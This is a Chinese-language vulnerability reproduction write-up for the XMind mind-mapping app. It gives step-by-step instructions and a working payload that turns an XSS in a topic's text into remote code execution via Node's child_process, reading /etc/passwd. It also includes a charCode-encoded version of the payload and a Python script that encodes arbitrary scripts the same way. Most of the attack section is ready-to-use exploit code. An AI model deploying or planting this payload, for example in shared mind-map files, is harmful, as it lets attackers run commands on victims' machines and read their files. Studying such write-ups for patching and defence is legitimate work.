0x00 漏洞概述

在xmind中使用payload即可引发XSS,通过修改payload可以将XSS升级为RCE,存在漏洞的xmind不分用户平台(windows, linux 以及mac 平台均可复现该漏洞)

0x01 漏洞复现-XSS

  • 以linux平台为例(mac,以及windows平台均可复现),首先下载好xmind,之后打开xmind,任意选择并新建一个模板

upload successful

  • 修改中心主题内容为xss payload,例如 <img src=x onerror=alert(1)>

upload successful

upload successful

  • 点击大纲,切换到大纲页面

upload successful

  • 此时会发现页面并未弹出XSS弹框,因为触发XSS还需要一个小步骤,如下

upload successful

  • 此时xmind就会触发xss

upload successful

0x02 漏洞复现-XSS to RCE

  • 之前只是弹出XSS弹框,接下来实践如何从XSS到RCE,只要将之前xmind的 XSS payload 切换为 如下编码后payload 即可:

    1
    2
    3
    4
    5
    6
    7
    8
    编码前payload 
    #Decode Payload
    <script>
    const { spawn } = require("child_process");
    const cat = spawn("cat", ["/etc/passwd"]);
    cat.stdout.on("data", data => {
    alert(`stdout: ${data}`);
    });</script>
    1
    2
    3
    编码后payload:
    #Encode Payload
    <img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,99,111,110,115,116,32,123,32,115,112,97,119,110,32,125,32,61,32,114,101,113,117,105,114,101,40,34,99,104,105,108,100,95,112,114,111,99,101,115,115,34,41,59,10,99,111,110,115,116,32,99,97,116,32,61,32,115,112,97,119,110,40,34,99,97,116,34,44,32,91,34,47,101,116,99,47,112,97,115,115,119,100,34,93,41,59,10,99,97,116,46,115,116,100,111,117,116,46,111,110,40,34,100,97,116,97,34,44,32,100,97,116,97,32,61,62,32,123,10,32,32,32,32,97,108,101,114,116,40,96,115,116,100,111,117,116,58,32,36,123,100,97,116,97,125,96,41,59,10,125,41,59,60,47,115,99,114,105,112,116,62))>
  • 同样的触发步骤,xmind弹出/etc/passwd文件的内容
    upload successful

0x03 生成编码后payload脚本(py)

1
2
3
4
5
6
7
8
9
10
11
12
13
decode_str = '''<script>
const { spawn } = require("child_process");
const cat = spawn("ls", ["/home"]);
cat.stdout.on("data", data => {
alert(`stdout: ${data}`);
});</script>'''
encode_str = "<img src=x onerror=writeln(String.fromCharCode("

for letter in decode_str:
encode_str = encode_str + str(ord(letter)) + ","

encode_str = encode_str.strip(",") + "))>"
print(encode_str)

0x04 参考链接如下